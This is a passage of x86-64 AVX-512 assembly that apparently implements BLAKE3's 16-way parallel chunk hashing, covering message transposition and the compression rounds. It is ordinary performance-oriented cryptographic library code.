_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 144
and rsp, 0xFFFFFFFFFFFFFFC0
neg r9
kmovw k1, r9d
vmovd xmm0, r8d
vpbroadcastd ymm0, xmm0
shr r8, 32
vmovd xmm1, r8d
vpbroadcastd ymm1, xmm1
vmovdqa ymm4, ymm1
vmovdqa ymm5, ymm1
vpaddd ymm2, ymm0, ymmword ptr [ADD0+rip]
vpaddd ymm3, ymm0, ymmword ptr [ADD0+32+rip]
vpcmpltud k2, ymm2, ymm0
vpcmpltud k3, ymm3, ymm0
vpaddd ymm4 {k2}, ymm4, dword ptr [ADD1+rip] {1to8}
vpaddd ymm5 {k3}, ymm5, dword ptr [ADD1+rip] {1to8}
knotw k2, k1
vmovdqa32 ymm2 {k2}, ymm0
vmovdqa32 ymm3 {k2}, ymm0
vmovdqa32 ymm4 {k2}, ymm1
vmovdqa32 ymm5 {k2}, ymm1
vmovdqa ymmword ptr [rsp], ymm2
vmovdqa ymmword ptr [rsp+0x1*0x20], ymm3
vmovdqa ymmword ptr [rsp+0x2*0x20], ymm4
vmovdqa ymmword ptr [rsp+0x3*0x20], ymm5
shl rdx, 6
mov qword ptr [rsp+0x80], rdx
cmp rsi, 16
jc 3f
2:
vpbroadcastd zmm0, dword ptr [rcx]
vpbroadcastd zmm1, dword ptr [rcx+0x1*0x4]
vpbroadcastd zmm2, dword ptr [rcx+0x2*0x4]
vpbroadcastd zmm3, dword ptr [rcx+0x3*0x4]
vpbroadcastd zmm4, dword ptr [rcx+0x4*0x4]
vpbroadcastd zmm5, dword ptr [rcx+0x5*0x4]
vpbroadcastd zmm6, dword ptr [rcx+0x6*0x4]
vpbroadcastd zmm7, dword ptr [rcx+0x7*0x4]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
.p2align 5
9:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x80]
cmove eax, ebx
mov dword ptr [rsp+0x88], eax
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x40]
mov r13, qword ptr [rdi+0x48]
mov r14, qword ptr [rdi+0x50]
mov r15, qword ptr [rdi+0x58]
vmovdqu32 ymm16, ymmword ptr [rdx+r8-0x2*0x20]
vinserti64x4 zmm16, zmm16, ymmword ptr [rdx+r12-0x2*0x20], 0x01
vmovdqu32 ymm17, ymmword ptr [rdx+r9-0x2*0x20]
vinserti64x4 zmm17, zmm17, ymmword ptr [rdx+r13-0x2*0x20], 0x01
vpunpcklqdq zmm8, zmm16, zmm17
vpunpckhqdq zmm9, zmm16, zmm17
vmovdqu32 ymm18, ymmword ptr [rdx+r10-0x2*0x20]
vinserti64x4 zmm18, zmm18, ymmword ptr [rdx+r14-0x2*0x20], 0x01
vmovdqu32 ymm19, ymmword ptr [rdx+r11-0x2*0x20]
vinserti64x4 zmm19, zmm19, ymmword ptr [rdx+r15-0x2*0x20], 0x01
vpunpcklqdq zmm10, zmm18, zmm19
vpunpckhqdq zmm11, zmm18, zmm19
mov r8, qword ptr [rdi+0x20]
mov r9, qword ptr [rdi+0x28]
mov r10, qword ptr [rdi+0x30]
mov r11, qword ptr [rdi+0x38]
mov r12, qword ptr [rdi+0x60]
mov r13, qword ptr [rdi+0x68]
mov r14, qword ptr [rdi+0x70]
mov r15, qword ptr [rdi+0x78]
vmovdqu32 ymm16, ymmword ptr [rdx+r8-0x2*0x20]
vinserti64x4 zmm16, zmm16, ymmword ptr [rdx+r12-0x2*0x20], 0x01
vmovdqu32 ymm17, ymmword ptr [rdx+r9-0x2*0x20]
vinserti64x4 zmm17, zmm17, ymmword ptr [rdx+r13-0x2*0x20], 0x01
vpunpcklqdq zmm12, zmm16, zmm17
vpunpckhqdq zmm13, zmm16, zmm17
vmovdqu32 ymm18, ymmword ptr [rdx+r10-0x2*0x20]
vinserti64x4 zmm18, zmm18, ymmword ptr [rdx+r14-0x2*0x20], 0x01
vmovdqu32 ymm19, ymmword ptr [rdx+r11-0x2*0x20]
vinserti64x4 zmm19, zmm19, ymmword ptr [rdx+r15-0x2*0x20], 0x01
vpunpcklqdq zmm14, zmm18, zmm19
vpunpckhqdq zmm15, zmm18, zmm19
vmovdqa32 zmm27, zmmword ptr [INDEX0+rip]
vmovdqa32 zmm31, zmmword ptr [INDEX1+rip]
vshufps zmm16, zmm8, zmm10, 136
vshufps zmm17, zmm12, zmm14, 136
vmovdqa32 zmm20, zmm16
vpermt2d zmm16, zmm27, zmm17
vpermt2d zmm20, zmm31, zmm17
vshufps zmm17, zmm8, zmm10, 221
vshufps zmm30, zmm12, zmm14, 221
vmovdqa32 zmm21, zmm17
vpermt2d zmm17, zmm27, zmm30
vpermt2d zmm21, zmm31, zmm30
vshufps zmm18, zmm9, zmm11, 136
vshufps zmm8, zmm13, zmm15, 136
vmovdqa32 zmm22, zmm18
vpermt2d zmm18, zmm27, zmm8
vpermt2d zmm22, zmm31, zmm8
vshufps zmm19, zmm9, zmm11, 221
vshufps zmm8, zmm13, zmm15, 221
vmovdqa32 zmm23, zmm19
vpermt2d zmm19, zmm27, zmm8
vpermt2d zmm23, zmm31, zmm8
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x40]
mov r13, qword ptr [rdi+0x48]
mov r14, qword ptr [rdi+0x50]
mov r15, qword ptr [rdi+0x58]
vmovdqu32 ymm24, ymmword ptr [r8+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r12+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r9+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r13+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm8, zmm24, zmm25
vpunpckhqdq zmm9, zmm24, zmm25
vmovdqu32 ymm24, ymmword ptr [r10+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r14+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r11+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r15+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm10, zmm24, zmm25
vpunpckhqdq zmm11, zmm24, zmm25
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
mov r8, qword ptr [rdi+0x20]
mov r9, qword ptr [rdi+0x28]
mov r10, qword ptr [rdi+0x30]
mov r11, qword ptr [rdi+0x38]
mov r12, qword ptr [rdi+0x60]
mov r13, qword ptr [rdi+0x68]
mov r14, qword ptr [rdi+0x70]
mov r15, qword ptr [rdi+0x78]
vmovdqu32 ymm24, ymmword ptr [r8+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r12+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r9+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r13+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm12, zmm24, zmm25
vpunpckhqdq zmm13, zmm24, zmm25
vmovdqu32 ymm24, ymmword ptr [r10+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r14+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r11+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r15+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm14, zmm24, zmm25
vpunpckhqdq zmm15, zmm24, zmm25
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
vshufps zmm24, zmm8, zmm10, 136
vshufps zmm30, zmm12, zmm14, 136
vmovdqa32 zmm28, zmm24
vpermt2d zmm24, zmm27, zmm30
vpermt2d zmm28, zmm31, zmm30
vshufps zmm25, zmm8, zmm10, 221
vshufps zmm30, zmm12, zmm14, 221
vmovdqa32 zmm29, zmm25
vpermt2d zmm25, zmm27, zmm30
vpermt2d zmm29, zmm31, zmm30
vshufps zmm26, zmm9, zmm11, 136
vshufps zmm8, zmm13, zmm15, 136
vmovdqa32 zmm30, zmm26
vpermt2d zmm26, zmm27, zmm8
vpermt2d zmm30, zmm31, zmm8
vshufps zmm8, zmm9, zmm11, 221
vshufps zmm10, zmm13, zmm15, 221
vpermi2d zmm27, zmm8, zmm10
vpermi2d zmm31, zmm8, zmm10
vpbroadcastd zmm8, dword ptr [BLAKE3_IV_0+rip]
vpbroadcastd zmm9, dword ptr [BLAKE3_IV_1+rip]
vpbroadcastd zmm10, dword ptr [BLAKE3_IV_2+rip]
vpbroadcastd zmm11, dword ptr [BLAKE3_IV_3+rip]
vmovdqa32 zmm12, zmmword ptr [rsp]
vmovdqa32 zmm13, zmmword ptr [rsp+0x1*0x40]
vpbroadcastd zmm14, dword ptr [BLAKE3_BLOCK_LEN+rip]
vpbroadcastd zmm15, dword ptr [rsp+0x22*0x4]
vpaddd zmm0, zmm0, zmm16
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm20
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm17
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm21
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm24
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm28
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm25
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm29
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm18
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm23
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm22
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm16
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm17
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm25
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm27
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm30
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm19
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm29
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm20
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm18
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm22
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm27
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm21
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm31
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm26
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm30
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm23
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm19
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm20
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm21
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm16
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm24
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm28
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm31
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm29
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm26
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm23
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm16
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm18
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm17
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
